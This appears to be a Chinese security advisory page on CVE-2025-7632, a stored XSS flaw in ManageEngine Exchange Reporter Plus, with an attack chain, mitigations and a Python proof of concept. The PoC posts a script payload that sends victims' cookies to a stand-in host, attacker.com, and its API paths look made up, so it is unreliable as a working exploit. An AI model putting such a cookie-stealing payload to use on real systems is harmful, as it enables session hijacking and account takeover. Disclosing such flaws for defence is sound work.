CVE-2025-7632 CVSS 7.3 高危

CVE-2025-7632 ManageEngine Exchange Reporter Plus存储型XSS漏洞

披露日期: 2025-11-11

来源: 0fc0942c-577d-436f-ae8e-945763c79b02

漏洞信息

漏洞编号

CVE-2025-7632

漏洞类型

存储型XSS

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zohocorp ManageEngine Exchange Reporter Plus

漏洞概述

CVE-2025-7632是Zohocorp ManageEngine Exchange Reporter Plus中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于5723及以下版本中，攻击者可以利用Public Folders报告功能注入恶意JavaScript代码。由于是存储型XSS，恶意代码会被永久保存在服务器端，当其他用户访问受影响页面时，恶意脚本会在其浏览器中执行。攻击者可借此窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或在内网中进一步横向移动。此漏洞需要低权限认证和用户交互才能触发，但由于其存储特性，危害范围较广。CVSS评分7.3，属于高危漏洞，机密性和完整性影响均为高。

技术细节

该漏洞是存储型XSS，攻击者通过Public Folders报告功能输入恶意JavaScript代码。该代码被存储在服务器数据库中，当其他用户查看报告时，服务器将恶意代码作为页面内容返回到用户浏览器。由于应用程序未对用户输入进行充分的输出编码或过滤，浏览器将其作为可执行脚本执行。攻击者可以利用此漏洞执行任意JavaScript代码，包括读取Cookie、修改页面内容、记录用户输入等。由于Exchange Reporter Plus通常具有较高的系统权限，攻击成功可能导致获取敏感Exchange数据或进一步提权。攻击者需要先认证为低权限用户，然后构造包含XSS payload的请求到Public Folders报告接口。

攻击链分析

STEP 1

步骤1

攻击者获取ManageEngine Exchange Reporter Plus的低权限账户

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload

STEP 3

步骤3

通过Public Folders报告功能将payload注入系统，payload被存储在数据库中

STEP 4

步骤4

管理员或普通用户访问Public Folders报告页面

STEP 5

步骤5

服务器将存储的恶意代码作为页面内容返回给用户浏览器

STEP 6

步骤6

用户浏览器执行恶意JavaScript，攻击者窃取Cookie、会话令牌或执行其他恶意操作

STEP 7

步骤7

攻击者利用窃取的凭证进行横向移动或进一步提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-7632 PoC - Stored XSS in ManageEngine Exchange Reporter Plus
# Target: ManageEngine Exchange Reporter Plus <= 5723

target_url = "http://target.com:8080"

# XSS Payload - Cookie Stealer
xss_payload = "<script>document.location='http://attacker.com/log?c='+document.cookie</script>"

# Login as low-privilege user
login_url = f"{target_url}/api/login"
login_data = {
    "username": "low_priv_user",
    "password": "password123"
}

session = requests.Session()
login_response = session.post(login_url, json=login_data)

if login_response.status_code == 200:
    # Inject XSS via Public Folders report
    inject_url = f"{target_url}/api/reports/public-folders"
    inject_data = {
        "folderName": xss_payload,
        "reportType": "publicFolders"
    }
    
    inject_response = session.post(inject_url, json=inject_data)
    
    if inject_response.status_code == 200:
        print("[+] XSS payload injected successfully!")
        print("[*] When admin views the report, cookie will be sent to attacker")
    else:
        print("[-] Injection failed")
else:
    print("[-] Login failed")

影响范围

ManageEngine Exchange Reporter Plus <= 5723

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制Public Folders报告功能的访问权限，仅允许必要用户访问；2)部署Web应用防火墙（WAF）规则过滤<script>等危险标签；3)对Exchange Reporter Plus实施网络隔离，限制暴露面；4)启用详细的审计日志监控异常访问行为；5)考虑暂时禁用Public Folders报告功能直到漏洞修复；6)加强对用户会话的管理，定期刷新会话令牌以降低会话劫持风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表